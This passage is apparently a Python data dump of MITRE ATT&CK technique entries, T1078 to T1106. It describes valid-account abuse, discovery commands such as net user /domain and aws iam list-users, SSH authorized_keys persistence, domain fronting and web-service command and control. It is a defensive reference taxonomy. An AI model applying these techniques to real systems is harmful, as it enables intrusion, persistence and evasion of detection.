                              '\n'
                              'By staging data on one system prior to Exfiltration, adversaries can minimize the '
                              'number of connections made to their C2 server and better evade detection.',
               'name': 'Remote Data Staging',
               'platforms': ['Linux', 'macOS', 'Windows', 'AWS', 'GCP', 'Azure']},
 'T1078': {'attack_id': 'T1078',
           'categories': ['defense-evasion', 'persistence', 'privilege-escalation', 'initial-access'],
           'description': 'Adversaries may obtain and abuse credentials of existing accounts as a means of gaining '
                          'Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised '
                          'credentials may be used to bypass access controls placed on various resources on systems '
                          'within the network and may even be used for persistent access to remote systems and '
                          'externally available services, such as VPNs, Outlook Web Access and remote desktop. '
                          'Compromised credentials may also grant an adversary increased privilege to specific systems '
                          'or access to restricted areas of the network. Adversaries may choose not to use malware or '
                          'tools in conjunction with the legitimate access those credentials provide to make it harder '
                          'to detect their presence.\n'
                          '\n'
                          'The overlap of permissions for local, domain, and cloud accounts across a network of '
                          'systems is of concern because the adversary may be able to pivot across accounts and '
                          'systems to reach a high level of access (i.e., domain or enterprise administrator) to '
                          'bypass access controls set within the enterprise. (Citation: TechNet Credential Theft)',
           'name': 'Valid Accounts',
           'platforms': ['Linux', 'macOS', 'Windows', 'AWS', 'GCP', 'Azure', 'SaaS', 'Office 365', 'Azure AD']},
 'T1078.001': {'attack_id': 'T1078.001',
               'categories': ['defense-evasion', 'persistence', 'privilege-escalation', 'initial-access'],
               'description': 'Adversaries may obtain and abuse credentials of a default account as a means of gaining '
                              'Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts '
                              'are those that are built-into an OS, such as the Guest or Administrator accounts on '
                              'Windows systems or default factory/provider set accounts on other types of systems, '
                              'software, or devices.(Citation: Microsoft Local Accounts Feb 2019)\n'
                              '\n'
                              'Default accounts are not limited to client machines, rather also include accounts that '
                              'are preset for equipment such as network devices and computer applications whether they '
                              'are internal, open source, or commercial. Appliances that come preset with a username '
                              'and password combination pose a serious threat to organizations that do not change it '
                              'post installation, as they are easy targets for an adversary. Similarly, adversaries '
                              'may also utilize publicly disclosed or stolen [Private '
                              'Keys](https://attack.mitre.org/techniques/T1552/004) or credential materials to '
                              'legitimately connect to remote environments via [Remote '
                              'Services](https://attack.mitre.org/techniques/T1021).(Citation: Metasploit SSH Module)',
               'name': 'Default Accounts',
               'platforms': ['Linux', 'macOS', 'Windows', 'AWS', 'GCP', 'Azure', 'Office 365', 'Azure AD', 'SaaS']},
 'T1078.002': {'attack_id': 'T1078.002',
               'categories': ['defense-evasion', 'persistence', 'privilege-escalation', 'initial-access'],
               'description': 'Adversaries may obtain and abuse credentials of a domain account as a means of gaining '
                              'Initial Access, Persistence, Privilege Escalation, or Defense Evasion. (Citation: '
                              'TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain '
                              'Services where access and permissions are configured across systems and services that '
                              'are part of that domain. Domain accounts can cover users, administrators, and '
                              'services.(Citation: Microsoft AD Accounts)\n'
                              '\n'
                              'Adversaries may compromise domain accounts, some with a high level of privileges, '
                              'through various means such as [OS Credential '
                              'Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access '
                              'to privileged resources of the domain.',
               'name': 'Domain Accounts',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1078.003': {'attack_id': 'T1078.003',
               'categories': ['defense-evasion', 'persistence', 'privilege-escalation', 'initial-access'],
               'description': 'Adversaries may obtain and abuse credentials of a local account as a means of gaining '
                              'Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Local accounts '
                              'are those configured by an organization for use by users, remote support, services, or '
                              'for administration on a single system or service.\n'
                              '\n'
                              'Local Accounts may also be abused to elevate privileges and harvest credentials through '
                              '[OS Credential Dumping](https://attack.mitre.org/techniques/T1003). Password reuse may '
                              'allow the abuse of local accounts across a set of machines on a network for the '
                              'purposes of Privilege Escalation and Lateral Movement. ',
               'name': 'Local Accounts',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1078.004': {'attack_id': 'T1078.004',
               'categories': ['defense-evasion', 'persistence', 'privilege-escalation', 'initial-access'],
               'description': 'Adversaries may obtain and abuse credentials of a cloud account as a means of gaining '
                              'Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts '
                              'are those created and configured by an organization for use by users, remote support, '
                              'services, or for administration of resources within a cloud service provider or SaaS '
                              'application. In some cases, cloud accounts may be federated with traditional identity '
                              'management system, such as Window Active Directory. (Citation: AWS Identity '
                              'Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD '
                              'Federation)\n'
                              '\n'
                              'Compromised credentials for cloud accounts can be used to harvest sensitive data from '
                              'online storage accounts and databases. Access to cloud accounts can also be abused to '
                              'gain Initial Access to a network by abusing a [Trusted '
                              'Relationship](https://attack.mitre.org/techniques/T1199). Similar to [Domain '
                              'Accounts](https://attack.mitre.org/techniques/T1078/002), compromise of federated cloud '
                              'accounts may allow adversaries to more easily move laterally within an environment.',
               'name': 'Cloud Accounts',
               'platforms': ['AWS', 'GCP', 'Azure', 'SaaS', 'Azure AD', 'Office 365']},
 'T1080': {'attack_id': 'T1080',
           'categories': ['lateral-movement'],
           'description': '\n'
                          'Adversaries may deliver payloads to remote systems by adding content to shared storage '
                          'locations, such as network drives or internal code repositories. Content stored on network '
                          'drives or in other shared locations may be tainted by adding malicious programs, scripts, '
                          'or exploit code to otherwise valid files. Once a user opens the shared tainted content, the '
                          "malicious portion can be executed to run the adversary's code on a remote system. "
                          'Adversaries may use tainted shared content to move laterally.\n'
                          '\n'
                          'A directory share pivot is a variation on this technique that uses several other techniques '
                          'to propagate malware when users access a shared network directory. It uses [Shortcut '
                          'Modification](https://attack.mitre.org/techniques/T1547/009) of directory .LNK files that '
                          'use [Masquerading](https://attack.mitre.org/techniques/T1036) to look like the real '
                          'directories, which are hidden through [Hidden Files and '
                          'Directories](https://attack.mitre.org/techniques/T1564/001). The malicious .LNK-based '
                          'directories have an embedded command that executes the hidden malware file in the directory '
                          "and then opens the real intended directory so that the user's expected action still occurs. "
                          'When used with frequently used network directories, the technique may result in frequent '
                          'reinfections and broad access to systems and potentially to new and higher privileged '
                          'accounts. (Citation: Retwin Directory Share Pivot)\n'
                          '\n'
                          'Adversaries may also compromise shared network directories through binary infections by '
                          'appending or prepending its code to the healthy binary on the shared network directory. The '
                          'malware may modify the original entry point (OEP) of the healthy binary to ensure that it '
                          'is executed before the legitimate code. The infection could continue to spread via the '
                          'newly infected file when it is executed by a remote system. These infections may target '
                          'both binary and non-binary formats that end with extensions including, but not limited to, '
                          '.EXE, .DLL, .SCR, .BAT, and/or .VBS.',
           'name': 'Taint Shared Content',
           'platforms': ['Windows']},
 'T1082': {'attack_id': 'T1082',
           'categories': ['discovery'],
           'description': 'An adversary may attempt to get detailed information about the operating system and '
                          'hardware, including version, patches, hotfixes, service packs, and architecture. '
                          'Adversaries may use the information from [System Information '
                          'Discovery](https://attack.mitre.org/techniques/T1082) during automated discovery to shape '
                          'follow-on behaviors, including whether or not the adversary fully infects the target and/or '
                          'attempts specific actions.\n'
                          '\n'
                          'Tools such as [Systeminfo](https://attack.mitre.org/software/S0096) can be used to gather '
                          'detailed system information. A breakdown of system data can also be gathered through the '
                          'macOS <code>systemsetup</code> command, but it requires administrative privileges.\n'
                          '\n'
                          'Infrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure allow access '
                          'to instance and virtual machine information via APIs. Successful authenticated API calls '
                          'can return data such as the operating system platform and status of a particular instance '
                          'or the model view of a virtual machine.(Citation: Amazon Describe Instance)(Citation: '
                          'Google Instances Resource)(Citation: Microsoft Virutal Machine API)',
           'name': 'System Information Discovery',
           'platforms': ['Linux', 'macOS', 'Windows', 'AWS', 'GCP', 'Azure']},
 'T1083': {'attack_id': 'T1083',
           'categories': ['discovery'],
           'description': 'Adversaries may enumerate files and directories or may search in specific locations of a '
                          'host or network share for certain information within a file system. Adversaries may use the '
                          'information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) '
                          'during automated discovery to shape follow-on behaviors, including whether or not the '
                          'adversary fully infects the target and/or attempts specific actions.\n'
                          '\n'
                          'Many command shell utilities can be used to obtain this information. Examples include '
                          '<code>dir</code>, <code>tree</code>, <code>ls</code>, <code>find</code>, and '
                          '<code>locate</code>. (Citation: Windows Commands JPCERT) Custom tools may also be used to '
                          'gather file and directory information and interact with the [Native '
                          'API](https://attack.mitre.org/techniques/T1106).',
           'name': 'File and Directory Discovery',
           'platforms': ['Linux', 'macOS', 'Windows']},
 'T1087': {'attack_id': 'T1087',
           'categories': ['discovery'],
           'description': 'Adversaries may attempt to get a listing of accounts on a system or within an environment. '
                          'This information can help adversaries determine which accounts exist to aid in follow-on '
                          'behavior.',
           'name': 'Account Discovery',
           'platforms': ['Linux', 'macOS', 'Windows', 'Office 365', 'Azure AD', 'AWS', 'GCP', 'Azure', 'SaaS']},
 'T1087.001': {'attack_id': 'T1087.001',
               'categories': ['discovery'],
               'description': 'Adversaries may attempt to get a listing of local system accounts. This information can '
                              'help adversaries determine which local accounts exist on a system to aid in follow-on '
                              'behavior.\n'
                              '\n'
                              'Commands such as <code>net user</code> and <code>net localgroup</code> of the '
                              '[Net](https://attack.mitre.org/software/S0039) utility and <code>id</code> and '
                              '<code>groups</code>on macOS and Linux can list local users and groups. On Linux, local '
                              'users can also be enumerated through the use of the <code>/etc/passwd</code> file.',
               'name': 'Local Account',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1087.002': {'attack_id': 'T1087.002',
               'categories': ['discovery'],
               'description': 'Adversaries may attempt to get a listing of domain accounts. This information can help '
                              'adversaries determine which domain accounts exist to aid in follow-on behavior.\n'
                              '\n'
                              'Commands such as <code>net user /domain</code> and <code>net group /domain</code> of '
                              'the [Net](https://attack.mitre.org/software/S0039) utility, <code>dscacheutil -q '
                              'group</code>on macOS, and <code>ldapsearch</code> on Linux can list domain users and '
                              'groups.',
               'name': 'Domain Account',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1087.003': {'attack_id': 'T1087.003',
               'categories': ['discovery'],
               'description': 'Adversaries may attempt to get a listing of email addresses and accounts. Adversaries '
                              'may try to dump Exchange address lists such as global address lists (GALs).(Citation: '
                              'Microsoft Exchange Address Lists)\n'
                              '\n'
                              'In on-premises Exchange and Exchange Online, the<code>Get-GlobalAddressList</code> '
                              'PowerShell cmdlet can be used to obtain email addresses and accounts from a domain '
                              'using an authenticated session.(Citation: Microsoft getglobaladdresslist)(Citation: '
                              'Black Hills Attacking Exchange MailSniper, 2016)',
               'name': 'Email Account',
               'platforms': ['Windows', 'Office 365']},
 'T1087.004': {'attack_id': 'T1087.004',
               'categories': ['discovery'],
               'description': 'Adversaries may attempt to get a listing of cloud accounts. Cloud accounts are those '
                              'created and configured by an organization for use by users, remote support, services, '
                              'or for administration of resources within a cloud service provider or SaaS '
                              'application.\n'
                              '\n'
                              'With authenticated access there are several tools that can be used to find accounts. '
                              'The <code>Get-MsolRoleMember</code> PowerShell cmdlet can be used to obtain account '
                              'names given a role or permissions group in Office 365.(Citation: Microsoft '
                              'msolrolemember)(Citation: GitHub Raindance) The Azure CLI (AZ CLI) also provides an '
                              'interface to obtain user accounts with authenticated access to a domain. The command '
                              '<code>az ad user list</code> will list all users within a domain.(Citation: Microsoft '
                              'AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018) \n'
                              '\n'
                              'The AWS command <code>aws iam list-users</code> may be used to obtain a list of users '
                              'in the current account while <code>aws iam list-roles</code> can obtain IAM roles that '
                              'have a specified path prefix.(Citation: AWS List Roles)(Citation: AWS List Users) In '
                              'GCP, <code>gcloud iam service-accounts list</code> and <code>gcloud projects '
                              'get-iam-policy</code> may be used to obtain a listing of service accounts and users in '
                              'a project.(Citation: Google Cloud - IAM Servie Accounts List API)',
               'name': 'Cloud Account',
               'platforms': ['AWS', 'GCP', 'Azure', 'Office 365', 'Azure AD', 'SaaS']},
 'T1090': {'attack_id': 'T1090',
           'categories': ['command-and-control'],
           'description': 'Adversaries may use a connection proxy to direct network traffic between systems or act as '
                          'an intermediary for network communications to a command and control server to avoid direct '
                          'connections to their infrastructure. Many tools exist that enable traffic redirection '
                          'through proxies or port redirection, including '
                          '[HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend '
                          'Micro APT Attack Tools) Adversaries use these types of proxies to manage command and '
                          'control communications, reduce the number of simultaneous outbound network connections, '
                          'provide resiliency in the face of connection loss, or to ride over existing trusted '
                          'communications paths between victims to avoid suspicion. Adversaries may chain together '
                          'multiple proxies to further disguise the source of malicious traffic.\n'
                          '\n'
                          'Adversaries can also take advantage of routing schemes in Content Delivery Networks (CDNs) '
                          'to proxy command and control traffic.',
           'name': 'Proxy',
           'platforms': ['Linux', 'macOS', 'Windows', 'Network']},
 'T1090.001': {'attack_id': 'T1090.001',
               'categories': ['command-and-control'],
               'description': 'Adversaries may use an internal proxy to direct command and control traffic between two '
                              'or more systems in a compromised environment. Many tools exist that enable traffic '
                              'redirection through proxies or port redirection, including '
                              '[HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: '
                              'Trend Micro APT Attack Tools) Adversaries use internal proxies to manage command and '
                              'control communications inside a compromised environment, to reduce the number of '
                              'simultaneous outbound network connections, to provide resiliency in the face of '
                              'connection loss, or to ride over existing trusted communications paths between infected '
                              'systems to avoid suspicion. Internal proxy connections may use common peer-to-peer '
                              '(p2p) networking protocols, such as SMB, to better blend in with the environment.\n'
                              '\n'
                              'By using a compromised internal system as a proxy, adversaries may conceal the true '
                              'destination of C2 traffic while reducing the need for numerous connections to external '
                              'systems.',
               'name': 'Internal Proxy',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1090.002': {'attack_id': 'T1090.002',
               'categories': ['command-and-control'],
               'description': 'Adversaries may use an external proxy to act as an intermediary for network '
                              'communications to a command and control server to avoid direct connections to their '
                              'infrastructure. Many tools exist that enable traffic redirection through proxies or '
                              'port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, '
                              'and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of '
                              'proxies to manage command and control communications, to provide resiliency in the face '
                              'of connection loss, or to ride over existing trusted communications paths to avoid '
                              'suspicion.\n'
                              '\n'
                              'External connection proxies are used to mask the destination of C2 traffic and are '
                              'typically implemented with port redirectors. Compromised systems outside of the victim '
                              'environment may be used for these purposes, as well as purchased infrastructure such as '
                              'cloud-based resources or virtual private servers. Proxies may be chosen based on the '
                              'low likelihood that a connection to them from a compromised system would be '
                              'investigated. Victim systems would communicate directly with the external proxy on the '
                              'Internet and then the proxy would forward communications to the C2 server.',
               'name': 'External Proxy',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1090.003': {'attack_id': 'T1090.003',
               'categories': ['command-and-control'],
               'description': 'To disguise the source of malicious traffic, adversaries may chain together multiple '
                              'proxies. Typically, a defender will be able to identify the last proxy traffic '
                              'traversed before it enters their network; the defender may or may not be able to '
                              'identify any previous proxies before the last-hop proxy. This technique makes '
                              'identifying the original source of the malicious traffic even more difficult by '
                              'requiring the defender to trace malicious traffic through several proxies to identify '
                              'its source. A particular variant of this behavior is to use onion routing networks, '
                              'such as the publicly available TOR network. (Citation: Onion Routing)\n'
                              '\n'
                              'In the case of network infrastructure, particularly routers, it is possible for an '
                              'adversary to leverage multiple compromised devices to create a multi-hop proxy chain '
                              'within the Wide-Area Network (WAN) of the enterprise.  By leveraging [Patch System '
                              'Image](https://attack.mitre.org/techniques/T1601/001), adversaries can add custom code '
                              'to the affected network devices that will implement onion routing between those nodes.  '
                              'This custom onion routing network will transport the encrypted C2 traffic through the '
                              'compromised population, allowing adversaries to communicate with any device within the '
                              'onion routing network.  This method is dependent upon the [Network Boundary '
                              'Bridging](https://attack.mitre.org/techniques/T1599) method in order to allow the '
                              'adversaries to cross the protected network boundary of the Internet perimeter and into '
                              'the organization’s WAN. Protocols such as ICMP may be used as a transport.',
               'name': 'Multi-hop Proxy',
               'platforms': ['Linux', 'macOS', 'Windows', 'Network']},
 'T1090.004': {'attack_id': 'T1090.004',
               'categories': ['command-and-control'],
               'description': 'Adversaries may take advantage of routing schemes in Content Delivery Networks (CDNs) '
                              'and other services which host multiple domains to obfuscate the intended destination of '
                              'HTTPS traffic or traffic tunneled through HTTPS. (Citation: Fifield Blocking Resistent '
                              'Communication through domain fronting 2015) Domain fronting involves using different '
                              'domain names in the SNI field of the TLS header and the Host field of the HTTP header. '
                              'If both domains are served from the same CDN, then the CDN may route to the address '
                              'specified in the HTTP header after unwrapping the TLS header. A variation of the the '
                              'technique, "domainless" fronting, utilizes a SNI field that is left blank; this may '
                              'allow the fronting to work even when the CDN attempts to validate that the SNI and HTTP '
                              'Host fields match (if the blank SNI fields are ignored).\n'
                              '\n'
                              'For example, if domain-x and domain-y are customers of the same CDN, it is possible to '
                              'place domain-x in the TLS header and domain-y in the HTTP header. Traffic will appear '
                              'to be going to domain-x, however the CDN may route it to domain-y.',
               'name': 'Domain Fronting',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1091': {'attack_id': 'T1091',
           'categories': ['lateral-movement', 'initial-access'],
           'description': 'Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, '
                          'by copying malware to removable media and taking advantage of Autorun features when the '
                          'media is inserted into a system and executes. In the case of Lateral Movement, this may '
                          'occur through modification of executable files stored on removable media or by copying '
                          'malware and renaming it to look like a legitimate file to trick users into executing it on '
                          'a separate system. In the case of Initial Access, this may occur through manual '
                          'manipulation of the media, modification of systems used to initially format the media, or '
                          "modification to the media's firmware itself.",
           'name': 'Replication Through Removable Media',
           'platforms': ['Windows']},
 'T1092': {'attack_id': 'T1092',
           'categories': ['command-and-control'],
           'description': 'Adversaries can perform command and control between compromised hosts on potentially '
                          'disconnected networks using removable media to transfer commands from system to system. '
                          'Both systems would need to be compromised, with the likelihood that an Internet-connected '
                          'system was compromised first and the second through lateral movement by [Replication '
                          'Through Removable Media](https://attack.mitre.org/techniques/T1091). Commands and files '
                          'would be relayed from the disconnected system to the Internet-connected system to which the '
                          'adversary has direct access.',
           'name': 'Communication Through Removable Media',
           'platforms': ['Linux', 'macOS', 'Windows']},
 'T1095': {'attack_id': 'T1095',
           'categories': ['command-and-control'],
           'description': 'Adversaries may use a non-application layer protocol for communication between host and C2 '
                          'server or among infected hosts within a network. The list of possible protocols is '
                          'extensive.(Citation: Wikipedia OSI) Specific examples include use of network layer '
                          'protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, '
                          'such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure '
                          '(SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).\n'
                          '\n'
                          'ICMP communication between hosts is one example.(Citation: Cisco Synful Knock Evolution)\n'
                          ' Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by '
                          'all IP-compatible hosts; (Citation: Microsoft ICMP) however, it is not as commonly '
                          'monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to '
                          'hide communications.',
           'name': 'Non-Application Layer Protocol',
           'platforms': ['Windows', 'Linux', 'macOS', 'Network']},
 'T1098': {'attack_id': 'T1098',
           'categories': ['persistence'],
           'description': 'Adversaries may manipulate accounts to maintain access to victim systems. Account '
                          'manipulation may consist of any action that preserves adversary access to a compromised '
                          'account, such as modifying credentials or permission groups. These actions could also '
                          'include account activity designed to subvert security policies, such as performing '
                          'iterative password updates to bypass password duration policies and preserve the life of '
                          'compromised credentials. In order to create or manipulate accounts, the adversary must '
                          'already have sufficient permissions on systems or the domain.',
           'name': 'Account Manipulation',
           'platforms': ['Windows', 'Office 365', 'Azure', 'GCP', 'Azure AD', 'AWS', 'Linux', 'macOS']},
 'T1098.001': {'attack_id': 'T1098.001',
               'categories': ['persistence'],
               'description': 'Adversaries may add adversary-controlled credentials to a cloud account to maintain '
                              'persistent access to victim accounts and instances within the environment.\n'
                              '\n'
                              'Adversaries may add credentials for Azure Service Principals in addition to existing '
                              'legitimate credentials(Citation: Create Azure Service Principal) to victim Azure '
                              'accounts.(Citation: Blue Cloud of Death)(Citation: Blue Cloud of Death Video) Azure '
                              'Service Principals support both password and certificate credentials.(Citation: Why AAD '
                              'Service Principals) With sufficient permissions, there are a variety of ways to add '
                              'credentials including the Azure Portal, Azure command line interface, and Azure or Az '
                              '[PowerShell](https://attack.mitre.org/techniques/T1059/001) modules.(Citation: '
                              'Demystifying Azure AD Service Principals)\n'
                              '\n'
                              'After gaining access through [Cloud '
                              'Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries may generate or '
                              'import their own SSH keys using either the <code>CreateKeyPair</code> or '
                              '<code>ImportKeyPair</code> API in AWS or the <code>gcloud compute os-login ssh-keys '
                              'add</code> command in GCP.(Citation: GCP SSH Key Add) This allows persistent access to '
                              'instances within the cloud environment without further usage of the compromised cloud '
                              'accounts.(Citation: Expel IO Evil in AWS)(Citation: Expel Behind the Scenes)',
               'name': 'Additional Cloud Credentials',
               'platforms': ['Azure AD', 'Azure', 'AWS', 'GCP']},
 'T1098.002': {'attack_id': 'T1098.002',
               'categories': ['persistence'],
               'description': 'Adversaries may grant additional permission levels, such as ReadPermission or '
                              'FullAccess, to maintain persistent access to an adversary-controlled email account. The '
                              '<code>Add-MailboxPermission</code> '
                              '[PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlet, available in '
                              'on-premises Exchange and in the cloud-based service Office 365, adds permissions to a '
                              'mailbox.(Citation: Microsoft - Add-MailboxPermission)(Citation: FireEye APT35 '
                              '2018)(Citation: Crowdstrike Hiding in Plain Sight 2018)\n'
                              '\n'
                              'This may be used in persistent threat incidents as well as BEC (Business Email '
                              'Compromise) incidents where an adversary can assign more access rights to the accounts '
                              'they wish to compromise. This may further enable use of additional techniques for '
                              'gaining access to systems. For example, compromised business accounts are often used to '
                              'send messages to other accounts in the network of the target business while creating '
                              'inbox rules (ex: [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)), '
                              'so the messages evade spam/phishing detection mechanisms.(Citation: Bienstock, D. - '
                              'Defending O365 - 2019)',
               'name': 'Exchange Email Delegate Permissions',
               'platforms': ['Windows', 'Office 365']},
 'T1098.003': {'attack_id': 'T1098.003',
               'categories': ['persistence'],
               'description': 'An adversary may add the Global Administrator role to an adversary-controlled account '
                              'to maintain persistent access to an Office 365 tenant.(Citation: Microsoft Support O365 '
                              'Add Another Admin, October 2019)(Citation: Microsoft O365 Admin Roles) With sufficient '
                              'permissions, a compromised account can gain almost unlimited access to data and '
                              'settings (including the ability to reset the passwords of other admins) via the global '
                              'admin role.(Citation: Microsoft O365 Admin Roles) \n'
                              '\n'
                              'This account modification may immediately follow [Create '
                              'Account](https://attack.mitre.org/techniques/T1136) or other malicious account '
                              'activity.',
               'name': 'Add Office 365 Global Administrator Role',
               'platforms': ['Office 365']},
 'T1098.004': {'attack_id': 'T1098.004',
               'categories': ['persistence'],
               'description': 'Adversaries may modify the SSH <code>authorized_keys</code> file to maintain '
                              'persistence on a victim host. Linux distributions and macOS commonly use key-based '
                              'authentication to secure the authentication process of SSH sessions for remote '
                              'management. The <code>authorized_keys</code> file in SSH specifies the SSH keys that '
                              'can be used for logging into the user account for which the file is configured. This '
                              "file is usually found in the user's home directory under "
                              '<code>&lt;user-home&gt;/.ssh/authorized_keys</code>.(Citation: SSH Authorized Keys) '
                              'Users may edit the system’s SSH config file to modify the directives '
                              'PubkeyAuthentication and RSAAuthentication to the value “yes” to ensure public key and '
                              'RSA authentication are enabled. The SSH config file is usually located under '
                              '<code>/etc/ssh/sshd_config</code>.\n'
                              '\n'
                              'Adversaries may modify SSH <code>authorized_keys</code> files directly with scripts or '
                              'shell commands to add their own adversary-supplied public keys. This ensures that an '
                              'adversary possessing the corresponding private key may log in as an existing user via '
                              'SSH.(Citation: Venafi SSH Key Abuse) (Citation: Cybereason Linux Exim Worm)',
               'name': 'SSH Authorized Keys',
               'platforms': ['Linux', 'macOS']},
 'T1102': {'attack_id': 'T1102',
           'categories': ['command-and-control'],
           'description': 'Adversaries may use an existing, legitimate external Web service as a means for relaying '
                          'data to/from a compromised system. Popular websites and social media acting as a mechanism '
                          'for C2 may give a significant amount of cover due to the likelihood that hosts within a '
                          'network are already communicating with them prior to a compromise. Using common services, '
                          'such as those offered by Google or Twitter, makes it easier for adversaries to hide in '
                          'expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries '
                          'an added level of protection.\n'
                          '\n'
                          'Use of Web services may also protect back-end C2 infrastructure from discovery through '
                          'malware binary analysis while also enabling operational resiliency (since this '
                          'infrastructure may be dynamically changed).',
           'name': 'Web Service',
           'platforms': ['Linux', 'macOS', 'Windows']},
 'T1102.001': {'attack_id': 'T1102.001',
               'categories': ['command-and-control'],
               'description': 'Adversaries may use an existing, legitimate external Web service to host information '
                              'that points to additional command and control (C2) infrastructure. Adversaries may post '
                              'content, known as a dead drop resolver, on Web services with embedded (and often '
                              'obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to '
                              'and be redirected by these resolvers.\n'
                              '\n'
                              'Popular websites and social media acting as a mechanism for C2 may give a significant '
                              'amount of cover due to the likelihood that hosts within a network are already '
                              'communicating with them prior to a compromise. Using common services, such as those '
                              'offered by Google or Twitter, makes it easier for adversaries to hide in expected '
                              'noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an '
                              'added level of protection.\n'
                              '\n'
                              'Use of a dead drop resolver may also protect back-end C2 infrastructure from discovery '
                              'through malware binary analysis while also enabling operational resiliency (since this '
                              'infrastructure may be dynamically changed).',
               'name': 'Dead Drop Resolver',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1102.002': {'attack_id': 'T1102.002',
               'categories': ['command-and-control'],
               'description': 'Adversaries may use an existing, legitimate external Web service as a means for sending '
                              'commands to and receiving output from a compromised system over the Web service '
                              'channel. Compromised systems may leverage popular websites and social media to host '
                              'command and control (C2) instructions. Those infected systems can then send the output '
                              'from those commands back over that Web service channel. The return traffic may occur in '
                              'a variety of ways, depending on the Web service being utilized. For example, the return '
                              'traffic may take the form of the compromised system posting a comment on a forum, '
                              'issuing a pull request to development project, updating a document hosted on a Web '
                              'service, or by sending a Tweet. \n'
                              '\n'
                              'Popular websites and social media acting as a mechanism for C2 may give a significant '
                              'amount of cover due to the likelihood that hosts within a network are already '
                              'communicating with them prior to a compromise. Using common services, such as those '
                              'offered by Google or Twitter, makes it easier for adversaries to hide in expected '
                              'noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an '
                              'added level of protection. ',
               'name': 'Bidirectional Communication',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1102.003': {'attack_id': 'T1102.003',
               'categories': ['command-and-control'],
               'description': 'Adversaries may use an existing, legitimate external Web service as a means for sending '
                              'commands to a compromised system without receiving return output over the Web service '
                              'channel. Compromised systems may leverage popular websites and social media to host '
                              'command and control (C2) instructions. Those infected systems may opt to send the '
                              'output from those commands back over a different C2 channel, including to another '
                              'distinct Web service. Alternatively, compromised systems may return no output at all in '
                              'cases where adversaries want to send instructions to systems and do not want a '
                              'response.\n'
                              '\n'
                              'Popular websites and social media acting as a mechanism for C2 may give a significant '
                              'amount of cover due to the likelihood that hosts within a network are already '
                              'communicating with them prior to a compromise. Using common services, such as those '
                              'offered by Google or Twitter, makes it easier for adversaries to hide in expected '
                              'noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an '
                              'added level of protection.',
               'name': 'One-Way Communication',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1104': {'attack_id': 'T1104',
           'categories': ['command-and-control'],
           'description': 'Adversaries may create multiple stages for command and control that are employed under '
                          'different conditions or for certain functions. Use of multiple stages may obfuscate the '
                          'command and control channel to make detection more difficult.\n'
                          '\n'
                          'Remote access tools will call back to the first-stage command and control server for '
                          'instructions. The first stage may have automated capabilities to collect basic host '
                          'information, update tools, and upload additional files. A second remote access tool (RAT) '
                          'could be uploaded at that point to redirect the host to the second-stage command and '
                          'control server. The second stage will likely be more fully featured and allow the adversary '
                          'to interact with the system through a reverse shell and additional RAT features.\n'
                          '\n'
                          'The different stages will likely be hosted separately with no overlapping infrastructure. '
                          'The loader may also have backup first-stage callbacks or [Fallback '
                          'Channels](https://attack.mitre.org/techniques/T1008) in case the original first-stage '
                          'communication path is discovered and blocked.',
           'name': 'Multi-Stage Channels',
           'platforms': ['Linux', 'macOS', 'Windows']},
 'T1105': {'attack_id': 'T1105',
           'categories': ['command-and-control'],
           'description': 'Adversaries may transfer tools or other files from an external system into a compromised '
                          'environment. Files may be copied from an external adversary controlled system through the '
                          'command and control channel to bring tools into the victim network or through alternate '
                          'protocols with another tool such as FTP. Files can also be copied over on Mac and Linux '
                          'with native tools like scp, rsync, and sftp.',
           'name': 'Ingress Tool Transfer',
           'platforms': ['Linux', 'macOS', 'Windows']},
 'T1106': {'attack_id': 'T1106',
           'categories': ['execution'],
           'description': 'Adversaries may directly interact with the native OS application programming interface '
                          '(API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS '
                          'services within the kernel, such as those involving hardware/devices, memory, and '
                          'processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are '
                          'leveraged by the OS during system boot (when other system components are not yet '
                          'initialized) as well as carrying out tasks and requests during routine operations.\n'
                          '\n'
                          'Functionality provided by native APIs are often also exposed to user-mode applications via '
                          'interfaces and libraries. For example, functions such as the Windows API '
                          '<code>CreateProcess()</code> or GNU <code>fork()</code> will allow programs and scripts to '
                          'start other processes.(Citation: Microsoft CreateProcess)(Citation: GNU Fork) This may '
                          'allow API callers to execute a binary, run a CLI command, load modules, etc. as thousands '
                          'of similar API functions exist for various system operations.(Citation: Microsoft '
                          'Win32)(Citation: LIBC)(Citation: GLIBC)\n'
                          '\n'
